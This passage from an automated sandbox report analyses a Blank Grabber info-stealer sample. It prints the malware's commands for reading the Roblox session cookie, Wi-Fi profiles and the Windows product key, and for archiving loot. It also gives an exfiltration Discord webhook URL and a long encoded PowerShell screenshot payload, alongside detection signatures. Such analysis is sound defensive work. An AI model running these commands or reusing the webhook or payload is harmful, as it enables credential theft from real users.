      • cmd.exe (PID: 9096 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9152 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7584 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7780 cmdline: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7356 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8376 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7236 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5756 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7644 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8524 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8316 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8416 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8588 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 12 entries

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAH

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\mei.exe, ParentImage: C:\Users\user\Desktop\mei.exe, ParentProcessId: 7484, ParentProcessName: mei.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7752, ProcessName: cmd.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: mei.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Antivirus detection for dropped file
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrAvira: detection malicious, Label: HEUR/AGEN.1351111
              Found malware configuration
              Source: mei.exe.7484.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC"}
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrReversingLabs: Detection: 35%
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrVirustotal: Detection: 48%Perma Link
              Multi AV Scanner detection for submitted file
              Source: mei.exeVirustotal: Detection: 48%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,89_2_00007FF7D79D901C
              Source: mei.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mei.exe, 00000001.00000002.2042234592.00007FFE11EC1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mei.exe, 00000001.00000002.2042619049.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mei.exe, 00000001.00000002.2040881972.00007FFE0E151000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: mei.exe, mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mei.exe, 00000001.00000002.2041297975.00007FFE101D1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mei.exe, 00000001.00000002.2042063741.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mei.exe, 00000001.00000002.2041795080.00007FFE10301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mei.exe, 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: 